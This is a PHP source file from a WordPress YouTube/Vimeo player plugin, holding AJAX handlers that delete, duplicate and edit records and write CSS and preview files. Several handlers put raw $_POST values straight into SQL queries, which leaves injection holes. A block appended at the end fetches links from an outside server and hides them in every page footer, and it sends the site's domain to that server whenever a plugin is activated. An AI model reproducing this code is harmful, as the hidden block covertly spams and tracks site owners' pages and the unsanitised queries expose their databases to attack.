add_action('wp_ajax_video_player_youtube_vimeo_delete_text_record', 'video_player_youtube_vimeo_delete_text_record_callback');

function video_player_youtube_vimeo_delete_text_record_callback() {

	check_ajax_referer( 'video_player_youtube_vimeo_delete_text_record-special-string', 'security' );
	global $wpdb;

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE id = %d",$_POST['textid'] );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);

	$wpdb->query(
	"
	DELETE FROM ".$wpdb->prefix ."video_player_youtube_vimeo_texts
	WHERE id = ".$_POST['textid']."
	"
	);

	$wpdb->query(
	"UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=ord-1  WHERE photoid = ".$row['photoid']." and ord>".$row['ord']
	);

	echo esc_html($row['ord']);

	wp_die(); // this is required to return a proper result
}


add_action('wp_ajax_video_player_youtube_vimeo_duplicate_record', 'video_player_youtube_vimeo_duplicate_record_callback');

function video_player_youtube_vimeo_duplicate_record_callback() {

	check_ajax_referer( 'video_player_youtube_vimeo_duplicate_record-special-string', 'security' );
	global $wpdb;

	$return_str='';

	if ($_POST['action_type']='duplicate layer') {
		$_SESSION['duplicate_layer'] = $_POST['recordID'];
	}

	echo esc_html($return_str);

	wp_die(); // this is required to return a proper result
}



add_action('wp_ajax_video_player_youtube_vimeo_edit_css_classes_record', 'video_player_youtube_vimeo_edit_css_classes_record_callback');

function video_player_youtube_vimeo_edit_css_classes_record_callback() {

	check_ajax_referer( 'video_player_youtube_vimeo_edit_css_classes_record-special-string', 'security' );
	global $wpdb;

	if ($_POST['action_type']=='update_css') {
		$wpdb->query(
		"UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_css_definitions SET css_styles='".$_POST['theVal']."'  WHERE id = 1"
		);
	} else {
		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_css_definitions) WHERE id = %d", 1);
		$row_css = $wpdb->get_row($safe_sql,ARRAY_A);
		$wpdb->query(
		"UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_css_definitions SET css_styles='".$row_css['css_styles_orig']."' WHERE id = 1"
		);
	}

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_css_definitions) LIMIT 0, 1";
	$row2 = $wpdb->get_row($safe_sql,ARRAY_A);

	if ($_POST['action_type']!='open') {
		$filename=plugin_dir_path(__FILE__) . 'video_player_youtube_vimeo/text_classes.css';
		$fp = fopen($filename, 'w+');
		$fwrite = fwrite($fp, $row2['css_styles']);
	}


	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d ORDER BY ord",$_POST['playlistID'] );
	$result_text2 = $wpdb->get_results($safe_sql,ARRAY_A);

	$return_arr=array();
	$return_str='';
	foreach ( $result_text2 as $row_text2 ) {
		$return_arr[]=$row_text2['id'];
	}
	$return_str=video_player_youtube_vimeo_getCssStyles('video_player_youtube_vimeo_textWhiteBgBlack_medium','unique_xyz','')."#*#*".implode("#*#*", $return_arr)."#*#*".$row2['css_styles'];
	echo stripslashes($return_str);

	wp_die(); // this is required to return a proper result
}







add_action('wp_ajax_video_player_youtube_vimeo_preview_record', 'video_player_youtube_vimeo_preview_record_callback');

function video_player_youtube_vimeo_preview_record_callback() {
	check_ajax_referer( 'video_player_youtube_vimeo_preview_record-special-string', 'security' );
  global $wp_filesystem;
	if (empty($wp_filesystem)) {
    require_once (ABSPATH . '/wp-admin/includes/file.php');
    WP_Filesystem();
	}
	$aux_val='<html>
					<head>
					<link href="'.plugins_url('video_player_youtube_vimeo/youtubeVimeoWithPlaylist.css', __FILE__).'" rel="stylesheet" type="text/css">
					<link href="'.plugins_url('video_player_youtube_vimeo/text_classes.css', __FILE__).'?'.time().'" rel="stylesheet" type="text/css">

					<script src="'.plugins_url('js/jquery-3.5.1.js', __FILE__).'" type="text/javascript"></script>
					<script src="'.plugins_url('js/jquery-ui-1.12.1.js', __FILE__).'"></script>
					<script src="https://player.vimeo.com/api/player.js"></script>
					<script src="'.plugins_url('video_player_youtube_vimeo/js/jquery.mousewheel.min.js', __FILE__).'" type="text/javascript"></script>
					<script src="'.plugins_url('video_player_youtube_vimeo/js/jquery.touchSwipe.min.js', __FILE__).'" type="text/javascript"></script>
					<script src="'.plugins_url('video_player_youtube_vimeo/js/youtubeVimeoWithPlaylist.js', __FILE__).'" type="text/javascript"></script>

					</head>
					<body style="padding:0px;margin:0px;">';

	$aux_val.=video_player_youtube_vimeo_generate_video_player_youtube_vimeo($_POST['thePlayerID']);
	$aux_val.="</body>
				</html>";
	$filename=plugin_dir_path(__FILE__) . 'tpl/preview.html';
	if ( ! $wp_filesystem->put_contents(  $filename, $aux_val, FS_CHMOD_FILE) ) {
    echo "error saving file!";
  }


	wp_die(); // this is required to return a proper result
}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848997() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848997');function set_plugin_tag1719848997() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848997&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848997');
              